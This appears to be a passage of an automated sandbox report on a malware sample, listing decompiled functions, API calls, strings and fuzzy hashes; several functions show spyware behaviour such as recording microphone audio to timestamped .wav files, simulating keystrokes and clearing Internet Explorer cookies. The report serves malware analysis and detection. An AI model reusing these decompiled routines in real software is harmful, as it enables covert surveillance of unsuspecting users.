Associated: 00000001.00000001.663464805.000000000046E000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$\^)|/$mscoree.dll$@
API String ID: 4061214504-2264850481
Opcode ID: cf529560109e4aeaa0b6227b52fd02001e3d9e793a6992bb7851381b5760add9
Instruction ID: 36f19943696364036933d2311ecb272c6f2d5fae401e37053126d4ae0350ac7b
Opcode Fuzzy Hash: cf529560109e4aeaa0b6227b52fd02001e3d9e793a6992bb7851381b5760add9
Instruction Fuzzy Hash: D0F04431A00218FBCB159F54DD49B9EBFB8EF05756F4040B6FD05A2251DB749E44CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00414D01, Relevance: 12.1, APIs: 8, Instructions: 101keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,00000001,0000001C,00000000,00000000), ref: 00414D35
SendInput.USER32(00000001,00000001,0000001C,00000000,00000000,00000000), ref: 00414D53
SendInput.USER32(00000001,00000001,0000001C,00000000,00000000,00000000), ref: 00414D70
SendInput.USER32(00000001,00000001,0000001C,00000000,00000000,00000000), ref: 00414D82
SendInput.USER32(00000001,00000001,0000001C), ref: 00414D99
SendInput.USER32(00000001,00000001,0000001C), ref: 00414DB6
SendInput.USER32(00000001,00000001,0000001C), ref: 00414DD2
SendInput.USER32(00000001,?,0000001C,?), ref: 00414DEF

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: InputSend
String ID:
API String ID: 3431551938-0
Opcode ID: 4d8406b475d53d094f7708dccc8f0da2d7160c828e2210d65b6fe013d34f5e38
Instruction ID: 1c3ebae4674db620b8e7c5111c256c0b34cebecf6d8767c0246b3f6db5257b86
Opcode Fuzzy Hash: 4d8406b475d53d094f7708dccc8f0da2d7160c828e2210d65b6fe013d34f5e38
Instruction Fuzzy Hash: 5F317E31D9021DA9FF118BD0DC46FFFBBB8AF58B14F00000AE600AA1C1D2E995858BE5

Uniqueness

Uniqueness Score: -1.00%

Function 0043F794, Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 389COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 0043F89C
__freea.LIBCMT ref: 0043F946
__freea.LIBCMT ref: 0043F964

Part of subcall function 0043025F: _free.LIBCMT ref: 00430275

Strings

a/p, xrefs: 0043FA2B
\^)|/, xrefs: 0043F79C
am/pm, xrefs: 0043F9C7

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: __freea$__alloca_probe_16_free
String ID: \^)|/$a/p$am/pm
API String ID: 2936374016-4018070276
Opcode ID: 782d0e6040be172f10b618b73174b8dacd4fc43852f78c241af253ec629a2cd3
Instruction ID: c1535bf575aac7bed42447c8edf9f02b96a7bb573905b29f424857ba0665afce
Opcode Fuzzy Hash: 782d0e6040be172f10b618b73174b8dacd4fc43852f78c241af253ec629a2cd3
Instruction Fuzzy Hash: B7D1C3B1D102069ADB289F68C8657BBB7B0EF0D310F24617BE905AB350D33DAD49CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00449917, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 222COMMON

Download Yara Rule

Strings

\^)|/, xrefs: 0044991F

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: \^)|/
API String ID: 0-265608074
Opcode ID: fa830057abcc8b387e5f38f4fefd5a7c0cf228110832fb7793e1b557fc6cc164
Instruction ID: 623c6c0656fb4ebab531a7bdec691ffdd67f929648fa1d9df32fc683c0f903f2
Opcode Fuzzy Hash: fa830057abcc8b387e5f38f4fefd5a7c0cf228110832fb7793e1b557fc6cc164
Instruction Fuzzy Hash: AF71F2319002969BEF21CF58D885ABFBB79FF41320F14426BE81167380DB74AD41E7A9

Uniqueness

Uniqueness Score: -1.00%

Function 00447385, Relevance: 10.7, APIs: 7, Instructions: 204
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00447385(void* __edx, char _a4) {
				void* _v8;
				void* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				char _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t53;
				void _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				signed int _t64;
				char _t92;
				char _t100;
				void* _t101;
				signed int _t104;
				void* _t107;
				void* _t121;
				char* _t123;
				signed int _t127;
				intOrPtr* _t132;
				void* _t133;
				intOrPtr* _t134;
				signed int _t135;
				signed int _t136;
				signed int _t137;
				signed int _t138;
				char* _t139;

				_t121 = __edx;
				_t100 = _a4;
				_v28 = _t100;
				_v24 = 0;
				if( *((intOrPtr*)(_t100 + 0xb0)) != 0 ||  *((intOrPtr*)(_t100 + 0xac)) != 0) {
					_v16 = 1;
					_t53 = E0043DAF9(_t101, 1, 0x50);
					_v8 = _t53;
					if(_t53 != 0) {
						_t104 = 0x14;
						memcpy(_t53,  *(_t100 + 0x88), _t104 << 2);
						_t132 = E0043E13D(0, 4);
						_t127 = 0;
						_v12 = _t132;
						L0043E9A5(0);
						_pop(_t107);
						if(_t132 != 0) {
							 *_t132 = 0;
							if( *((intOrPtr*)(_t100 + 0xb0)) == 0) {
								_t133 = _v8;
								_t57 =  *0x469188; // 0x469180
								 *_t133 = _t57;
								_t58 =  *0x46918c; // 0x46a64c
								 *((intOrPtr*)(_t133 + 4)) = _t58;
								_t59 =  *0x469190; // 0x46a64c
								 *((intOrPtr*)(_t133 + 8)) = _t59;
								_t60 =  *0x4691b8; // 0x469184
								 *((intOrPtr*)(_t133 + 0x30)) = _t60;
								_t61 =  *0x4691bc; // 0x46a650
								 *((intOrPtr*)(_t133 + 0x34)) = _t61;
								L19:
								 *_v12 = 1;
								if(_t127 != 0) {
									 *_t127 = 1;
								}
								goto L21;
							}
							_t134 = E0043E13D(_t107, 4);
							_v20 = _t134;
							L0043E9A5(0);
							if(_t134 == 0) {
								L11:
								L0043E9A5(_v8);
								L0043E9A5(_v12);
								return _v16;
							}
							 *_t134 = 0;
							_t128 =  *((intOrPtr*)(_t100 + 0xb0));
							_t135 = L00449D60(_t100, _t121,  *((intOrPtr*)(_t100 + 0xb0)), _t134,  &_v28, 1,  *((intOrPtr*)(_t100 + 0xb0)), 0xe, _v8);
							_t136 = _t135 | L00449D60(_t100, _t121,  *((intOrPtr*)(_t100 + 0xb0)), _t135,  &_v28, 1, _t128, 0xf, _v8 + 4);
							_v16 = _v8 + 8;
							_t137 = _t136 | L00449D60(_t100, _t121, _t128, _t136,  &_v28, 1, _t128, 0x10, _v8 + 8);
							_t138 = _t137 | L00449D60(_t100, _t121, _t128, _t137,  &_v28, 2, _t128, 0xe, _v8 + 0x30);
							if((L00449D60(_t100, _t121, _t128, _t138,  &_v28, 2, _t128, 0xf, _v8 + 0x34) | _t138) == 0) {
								_t123 =  *_v16;
								while( *_t123 != 0) {
									_t92 =  *_t123;
									if(_t92 < 0x30 || _t92 > 0x39) {
										if(_t92 != 0x3b) {
											goto L16;
										}
										_t139 = _t123;
										do {
											 *_t139 =  *((intOrPtr*)(_t139 + 1));
											_t139 = _t139 + 1;
										} while ( *_t139 != 0);
									} else {
										 *_t123 = _t92 - 0x30;
										L16:
										_t123 = _t123 + 1;
									}
								}
								_t127 = _v20;
								_t133 = _v8;
								goto L19;
							}
							E0044731C(_v8);
							_v16 = _v16 | 0xffffffff;
							goto L11;
						}
						L0043E9A5(_v8);
						return 1;
					}
					return 1;
				} else {
					_t127 = 0;
					_v12 = 0;
					_t133 = 0x469188;
					L21:
					_t64 =  *(_t100 + 0x80);
					if(_t64 != 0) {
						asm("lock dec dword [eax]");
					}
					if( *((intOrPtr*)(_t100 + 0x7c)) != 0) {
						asm("lock xadd [ecx], eax");
						if((_t64 | 0xffffffff) == 0) {
							L0043E9A5( *((intOrPtr*)(_t100 + 0x7c)));
							L0043E9A5( *(_t100 + 0x88));
						}
					}
					 *((intOrPtr*)(_t100 + 0x7c)) = _v12;
					 *(_t100 + 0x80) = _t127;
					 *(_t100 + 0x88) = _t133;
					return 0;
				}
			}

0x00447385
0x0044738e
0x00447395
0x00447398
0x004473a1
0x004473c0
0x004473c3
0x004473c8
0x004473cf
0x004473e2
0x004473e3
0x004473ec
0x004473ee
0x004473f1
0x004473f4
0x004473fa
0x004473fd
0x00447410
0x00447418
0x00447572
0x00447575
0x0044757a
0x0044757c
0x00447581
0x00447584
0x00447589
0x0044758c
0x00447591
0x00447594
0x00447599
0x00447502
0x00447508
0x0044750c
0x0044750e
0x0044750e
0x00000000
0x0044750c
0x00447425
0x00447428
0x0044742b
0x00447434
0x004474c9
0x004474cc
0x004474d5
0x00000000
0x004474de
0x0044743d
0x00447442
0x00447456
0x0044746a
0x00447476
0x00447484
0x0044749e
0x004474ba
0x004474e4
0x004474f7
0x004474e8
0x004474ec
0x0044755f
0x00000000
0x00000000
0x00447561
0x00447563
0x00447566
0x00447568
0x0044756b
0x004474f2
0x004474f4
0x004474f6
0x004474f6
0x004474f6
0x004474ec
0x004474fc
0x004474ff
0x00000000
0x004474ff
0x004474bf
0x004474c4
0x00000000
0x004474c8
0x00447402
0x00000000
0x0044740a
0x00000000
0x004473ab
0x004473ab
0x004473ad
0x004473b0
0x00447510
0x00447510
0x00447518
0x0044751a
0x0044751a
0x00447522
0x00447527
0x0044752b
0x00447530
0x0044753b
0x00447541
0x0044752b
0x00447545
0x0044754a
0x00447550
0x00000000
0x00447550

APIs

_free.LIBCMT ref: 004473F4
_free.LIBCMT ref: 00447402
_free.LIBCMT ref: 00447530
_free.LIBCMT ref: 0044753B

Memory Dump Source

Source File: 00000001.00000001.663167910.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.663464805.000000000046E000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: d357481c2c790950858f38139910d17be54fd6de4c61f76a8490f32f89b43f67
Instruction ID: 9e92fa925d4cee6539ded2fc2cf78e0aa1e8db2d8ac0578f4c6c8b038968377e
Opcode Fuzzy Hash: d357481c2c790950858f38139910d17be54fd6de4c61f76a8490f32f89b43f67
Instruction Fuzzy Hash: C361D171D04205AFEB20CF69C841BAABBF5EF49720F24406BE844EB381E7749D42DB58

Uniqueness

Uniqueness Score: -1.00%

Function 00441613, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 171timeCOMMON

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,004580DC), ref: 0044167D
WideCharToMultiByte.KERNEL32(00000000,00000000,0046A754,000000FF,00000000,0000003F,00000000,?,?), ref: 004416F5
WideCharToMultiByte.KERNEL32(00000000,00000000,0046A7A8,000000FF,?,0000003F,00000000,?), ref: 00441722
_free.LIBCMT ref: 0044166B

Part of subcall function 0043E9A5: HeapFree.KERNEL32(00000000,00000000,?,004475CF,00000000,00000000,00000000,00000000,?,00447873,00000000,00000007,00000000,?,00447DBE,00000000), ref: 0043E9BB
Part of subcall function 0043E9A5: GetLastError.KERNEL32(00000000,?,004475CF,00000000,00000000,00000000,00000000,?,00447873,00000000,00000007,00000000,?,00447DBE,00000000,00000000), ref: 0043E9CD

_free.LIBCMT ref: 00441837

Strings

\^)|/, xrefs: 00441779

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID: \^)|/
API String ID: 1286116820-265608074
Opcode ID: 9b647d92996cf719646ce40e910e2037b1954c2f8e1329521e70fa154d9e504e
Instruction ID: 7190a0cc2208a7861e1e54b221412cba36a747ec42f74b48c1556530cbbd9320
Opcode Fuzzy Hash: 9b647d92996cf719646ce40e910e2037b1954c2f8e1329521e70fa154d9e504e
Instruction Fuzzy Hash: 8D51EA71900209ABEB10EF65DC8196A77BCEF45365F10417FE414A72A1EB788EC1CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 0043C02B, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 129
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E0043C02B(signed int* __ecx, signed int __edx) {
				signed int _v8;
				intOrPtr* _v12;
				signed int _v16;
				signed int _t28;
				signed int _t29;
				intOrPtr _t33;
				signed int _t37;
				signed int _t38;
				signed int _t40;
				void* _t50;
				signed int _t56;
				intOrPtr* _t57;
				signed int _t68;
				signed int _t71;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t78;
				signed int _t80;
				signed int* _t81;
				signed int _t85;
				void* _t86;

				_t72 = __edx;
				_v12 = __ecx;
				_t28 =  *__ecx;
				_t81 =  *_t28;
				if(_t81 != 0) {
					_t29 =  *0x46900c; // 0x7c295e5c
					_t56 =  *_t81 ^ _t29;
					_t78 = _t81[1] ^ _t29;
					_t83 = _t81[2] ^ _t29;
					asm("ror edi, cl");
					asm("ror esi, cl");
					asm("ror ebx, cl");
					if(_t78 != _t83) {
						L14:
						 *_t78 = E0043C32A( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))));
						_t33 = L0042E75A(_t56);
						_t57 = _v12;
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)))) = _t33;
						_t24 = _t78 + 4; // 0x4
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 4)) = L0042E75A(_t24);
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 8)) = L0042E75A(_t83);
						_t37 = 0;
						L15:
						return _t37;
					}
					_t38 = 0x200;
					_t85 = _t83 - _t56 >> 2;
					if(_t85 <= 0x200) {
						_t38 = _t85;
					}
					_t80 = _t38 + _t85;
					if(_t80 == 0) {
						_t80 = 0x20;
					}
					if(_t80 < _t85) {
						L9:
						_push(4);
						_t80 = _t85 + 4;
						_push(_t80);
						_v8 = E00446435(_t56);
						_t40 = L0043E9A5(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							goto L11;
						}
						_t37 = _t40 | 0xffffffff;
						goto L15;
					} else {
						_push(4);
						_push(_t80);
						_v8 = E00446435(_t56);
						L0043E9A5(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							L11:
							_t56 = _t68;
							_v8 = _t68 + _t85 * 4;
							_t83 = _t68 + _t80 * 4;
							_t78 = _v8;
							_push(0x20);
							asm("ror eax, cl");
							_t71 = _t78;
							_v16 = 0 ^  *0x46900c;
							asm("sbb edx, edx");
							_t74 =  !_t72 & _t68 + _t80 * 0x00000004 - _t78 + 0x00000003 >> 0x00000002;
							_v8 = _t74;
							if(_t74 == 0) {
								goto L14;
							}
							_t75 = _v16;
							_t50 = 0;
							do {
								_t50 = _t50 + 1;
								 *_t71 = _t75;
								_t71 = _t71 + 4;
							} while (_t50 != _v8);
							goto L14;
						}
						goto L9;
					}
				}
				return _t28 | 0xffffffff;
			}

0x0043c02b
0x0043c035
0x0043c039
0x0043c03b
0x0043c03f
0x0043c049
0x0043c05a
0x0043c05f
0x0043c061
0x0043c063
0x0043c065
0x0043c067
0x0043c06b
0x0043c125
0x0043c133
0x0043c135
0x0043c13a
0x0043c141
0x0043c143
0x0043c151
0x0043c160
0x0043c163
0x0043c165
0x00000000
0x0043c166
0x0043c073
0x0043c078
0x0043c07d
0x0043c07f
0x0043c07f
0x0043c081
0x0043c086
0x0043c08a
0x0043c08a
0x0043c08d
0x0043c0ac
0x0043c0ac
0x0043c0ae
0x0043c0b1
0x0043c0ba
0x0043c0bd
0x0043c0c2
0x0043c0c5
0x0043c0ca
0x00000000
0x00000000
0x0043c0cc
0x00000000
0x0043c08f
0x0043c08f
0x0043c091
0x0043c09a
0x0043c09d
0x0043c0a2
0x0043c0a5
0x0043c0aa
0x0043c0d4
0x0043c0d7
0x0043c0d9
0x0043c0dc
0x0043c0e4
0x0043c0ea
0x0043c0f1
0x0043c0f3
0x0043c0fb
0x0043c10a
0x0043c10e
0x0043c110
0x0043c113
0x00000000
0x00000000
0x0043c115
0x0043c118
0x0043c11a
0x0043c11a
0x0043c11b
0x0043c11d
0x0043c120
0x00000000
0x0043c11a
0x00000000
0x0043c0aa
0x0043c08d
0x00000000

APIs

_free.LIBCMT ref: 0043C09D
_free.LIBCMT ref: 0043C0BD

Strings

\^)|/, xrefs: 0043C049, 0043C0DF

Memory Dump Source

Source File: 00000001.00000001.663167910.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.663464805.000000000046E000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free
String ID: \^)|/
API String ID: 269201875-265608074
Opcode ID: deaa131bb674c662e15d50ae53710fa0553b611cd25fe84f53ec73c588c233d4
Instruction ID: 92331f9ddc06131b0e7ec0c6bc5169071c072941651fb01b01da67a513e3a854
Opcode Fuzzy Hash: deaa131bb674c662e15d50ae53710fa0553b611cd25fe84f53ec73c588c233d4
Instruction Fuzzy Hash: 99410436A00200DFDF24DF79C880A5AB3B5EF88314F11816AE915EB382DB35AD01CB85

Uniqueness

Uniqueness Score: -1.00%

Function 00404E5D, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 112timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00404E98
GetLocalTime.KERNEL32(?), ref: 00404F55

Strings

KeepAlive timeout changed to %i, xrefs: 00404F73
Connection KeepAlive timeout: %i, xrefs: 00404F03
Connection KeepAlive enabled, xrefs: 00404EB5
%02i:%02i:%02i:%03i [Info] , xrefs: 00404E89, 00404EBA, 00404F08, 00404F78

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: LocalTime
String ID: %02i:%02i:%02i:%03i [Info] $Connection KeepAlive enabled$Connection KeepAlive timeout: %i$KeepAlive timeout changed to %i
API String ID: 481472006-2341810981
Opcode ID: e8f6787649cda12effe7b19f211dbcdbb8e1f6ceebc0eada28a903f11159291b
Instruction ID: 8bf995e8c12e12e9400113c14361f082bab786edd97fa27ebf04c41015186da6
Opcode Fuzzy Hash: e8f6787649cda12effe7b19f211dbcdbb8e1f6ceebc0eada28a903f11159291b
Instruction Fuzzy Hash: AE417DA1C041196ACB10EBB6DC15ABFB7A8DB54309F10407BF941B20E2EB7C9A44D7A9

Uniqueness

Uniqueness Score: -1.00%

Function 00447A8C, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00438F9C,?,00000000,?,00000001,?,?,00000001,00438F9C,?), ref: 00447AD9
__alloca_probe_16.LIBCMT ref: 00447B11
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00447B62
GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,004351F1,?), ref: 00447B74
__freea.LIBCMT ref: 00447B7D

Part of subcall function 0043E13D: RtlAllocateHeap.NTDLL(00000000,0042F6B9,?,?,00430DF7,?,?,00000000,?,?,0040B6B7,0042F6B9,?,?,?,?), ref: 0043E16F

Strings

\^)|/, xrefs: 00447A94

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
String ID: \^)|/
API String ID: 313313983-265608074
Opcode ID: a2983691ef8cd37b58885340316c613968eda3d88d360ec8ce0df6a9cc8fb1be
Instruction ID: e35ca47492d54a7e512c2142bd04d6966d0ad330955e565b8834b0112d25292e
Opcode Fuzzy Hash: a2983691ef8cd37b58885340316c613968eda3d88d360ec8ce0df6a9cc8fb1be
Instruction Fuzzy Hash: 2731F032A0024AABEF258F65CC41DAF7BA5EB44318F04016AFC04D7291E739ED55CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00404D4A, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 96timethreadCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00404D82
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404E35
CreateThread.KERNEL32(00000000,00000000,0040503A,?,00000000,00000000), ref: 00404E48

Strings

Connection KeepAlive timeout: %i, xrefs: 00404DF2
Connection KeepAlive enabled, xrefs: 00404DA4
%02i:%02i:%02i:%03i [Info] , xrefs: 00404D94, 00404DA9, 00404DF7

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Create$EventLocalThreadTime
String ID: %02i:%02i:%02i:%03i [Info] $Connection KeepAlive enabled$Connection KeepAlive timeout: %i
API String ID: 2532271599-119634454
Opcode ID: c81d75b25aac04037c6033754fc0ecebe9b67c054d7167187e10f734aba4ece8
Instruction ID: 1dfe594111c4f472cfa2094443fb7add836f39d5d4ea4ce2dd071497a0d1df19
Opcode Fuzzy Hash: c81d75b25aac04037c6033754fc0ecebe9b67c054d7167187e10f734aba4ece8
Instruction Fuzzy Hash: F13194A1904254A9CB10A7A6CC05EBFBBBCAB95709F00046FF941B21D2EB7C9945D774

Uniqueness

Uniqueness Score: -1.00%

Function 00401C53, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89COMMON

Download Yara Rule

APIs

_strftime.LIBCMT ref: 00401C98

Part of subcall function 004019C8: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401A30

waveInUnprepareHeader.WINMM(0046AA78,00000020,00000000,?), ref: 00401D4A
waveInPrepareHeader.WINMM(0046AA78,00000020), ref: 00401D88
waveInAddBuffer.WINMM(0046AA78,00000020), ref: 00401D97

Strings

%Y-%m-%d %H.%M, xrefs: 00401C89
.wav, xrefs: 00401CB1

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
String ID: %Y-%m-%d %H.%M$.wav
API String ID: 3809562944-3597965672
Opcode ID: 7113415147a57ac18791889634f4a79b3e6c766bde887fd2c1e62d3cf80f7879
Instruction ID: 575ed27fc73d6bdeb11dc44c8d894a2cbf1aae3e395c85bd687042a3cc02f847
Opcode Fuzzy Hash: 7113415147a57ac18791889634f4a79b3e6c766bde887fd2c1e62d3cf80f7879
Instruction Fuzzy Hash: 42314C315047009BC314EB61DD56A9E77A8AB54304F00483FF956A21F1FF789958CF9B

Uniqueness

Uniqueness Score: -1.00%

Function 0040A3C1, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0040A3C1(void* __eflags) {
				char _v28;
				char _v52;
				char _v76;
				char _v340;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t17;
				int _t34;
				int _t37;
				void* _t40;
				void* _t41;
				char* _t42;
				void* _t48;
				char* _t55;
				void* _t59;
				void* _t61;
				void* _t62;

				_t42 =  &_v28;
				E0040201F(_t40, _t42);
				_push(_t42);
				_t41 = 0;
				_t17 = E004101A2( &_v52, 0x80000001, "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", "Cookies");
				_t62 = _t61 + 0xc;
				L00401F1B( &_v28, 0x80000001, _t59, _t17);
				L00401F11();
				_t58 = 0x45e65c;
				if(L0040592C(0x45e65c) == 0) {
					ExpandEnvironmentStringsA(L00401EF9( &_v28),  &_v340, 0x104);
					__eflags = PathFileExistsA( &_v340);
					if(__eflags == 0) {
						goto L1;
					} else {
						L00401FCE(0,  &_v52,  &_v340);
						_t58 =  &_v52;
						_t34 = E004170D3(L00401E4F(L00416CBE( &_v76,  &_v52, __eflags)));
						L00401E54();
						_t55 =  &_v52;
						L00401F11();
						__eflags = _t34;
						if(_t34 == 0) {
							_push(_t55);
							_push(_t55);
							_t37 = L0040A6CD();
							__eflags = _t37;
							if(_t37 != 0) {
								_t41 = 1;
								L00401FCE(1, _t62 - 0x18, "\n[IE cookies cleared!]");
								L0040A6A7(1,  &_v52);
								goto L8;
							}
						} else {
							_t48 = _t62 - 0x18;
							_push("\n[IE cookies cleared!]");
							goto L2;
						}
					}
				} else {
					L1:
					_t48 = _t62 - 0x18;
					_push("\n[IE cookies not found]");
					L2:
					L00401FCE(_t41, _t48);
					L0040A6A7(_t41, _t58);
					_t41 = 1;
					L8:
				}
				L00401F11();
				return _t41;
			}

0x0040a3ca
0x0040a3cf
0x0040a3d4
0x0040a3e7
0x0040a3e9
0x0040a3ee
0x0040a3f5
0x0040a3fd
0x0040a402
0x0040a411
0x0040a443
0x0040a456
0x0040a458
0x00000000
0x0040a45a
0x0040a464
0x0040a469
0x0040a47d
0x0040a487
0x0040a48c
0x0040a48f
0x0040a494
0x0040a496
0x0040a4a7
0x0040a4a8
0x0040a4a9
0x0040a4ae
0x0040a4b0
0x0040a4b5
0x0040a4be
0x0040a4c3
0x00000000
0x0040a4c3
0x0040a498
0x0040a49b
0x0040a49d
0x00000000
0x0040a49d
0x0040a496
0x0040a413
0x0040a413
0x0040a416
0x0040a418
0x0040a41d
0x0040a41d
0x0040a422
0x0040a427
0x0040a4c8
0x0040a4c8
0x0040a4ce
0x0040a4da

APIs

Part of subcall function 004101A2: RegOpenKeyExA.KERNELBASE(80000002,00000400,00000000,00020019,?), ref: 004101C4
Part of subcall function 004101A2: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 004101E3
Part of subcall function 004101A2: RegCloseKey.ADVAPI32(?), ref: 004101EC

ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040A443
PathFileExistsA.SHLWAPI(?), ref: 0040A450

Strings

Cookies, xrefs: 0040A3D5
[IE cookies cleared!], xrefs: 0040A49D, 0040A4B9
Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders, xrefs: 0040A3DA
[IE cookies not found], xrefs: 0040A418

Memory Dump Source

Source File: 00000001.00000001.663167910.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.663464805.000000000046E000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
API String ID: 1133728706-4073444585
Opcode ID: 6fe05b5e4ea5ab6a55d35793342531bf345447385e14b6aa17681d37fe234b9a
Instruction ID: d5e9cc76f99a5f8b44f48b9645c9cc4fef08dd43433ab9bf908d18e382b7cbe2
Opcode Fuzzy Hash: 6fe05b5e4ea5ab6a55d35793342531bf345447385e14b6aa17681d37fe234b9a
Instruction Fuzzy Hash: D221BD31A10205A6CB04B7B2CC5B9EE7768AF54309F80003FB901772D2EA7D9A5986DA

Uniqueness

Uniqueness Score: -1.00%

Function 0044F533, Relevance: 10.6, APIs: 7, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7748bd1ac94ca647615f35ca8bf9828bfb366f5bbdc49ec4c2ec5d07d4698645
Instruction ID: cc7882b42a7914501b4c3d2001ac0da2d7db77e33fcd613d0a1b3bd26a0c9ccc
Opcode Fuzzy Hash: 7748bd1ac94ca647615f35ca8bf9828bfb366f5bbdc49ec4c2ec5d07d4698645
Instruction Fuzzy Hash: 4911E472505215BBEB202F769C0996B7AACEF86374F10426BB811D6292DE78CC008279

Uniqueness

Uniqueness Score: -1.00%

Function 0040E9AC, Relevance: 10.6, APIs: 7, Instructions: 75COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040E9B9
int.LIBCPMT ref: 0040E9CC

Part of subcall function 0040B938: std::_Lockit::_Lockit.LIBCPMT ref: 0040B949
Part of subcall function 0040B938: std::_Lockit::~_Lockit.LIBCPMT ref: 0040B963

std::locale::_Getfacet.LIBCPMT ref: 0040E9D5
std::_Facet_Register.LIBCPMT ref: 0040EA0C
std::_Lockit::~_Lockit.LIBCPMT ref: 0040EA15
__CxxThrowException@8.LIBVCRUNTIME ref: 0040EA33
__Init_thread_footer.LIBCMT ref: 0040EA74

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetInit_thread_footerRegisterThrowstd::locale::_
String ID:
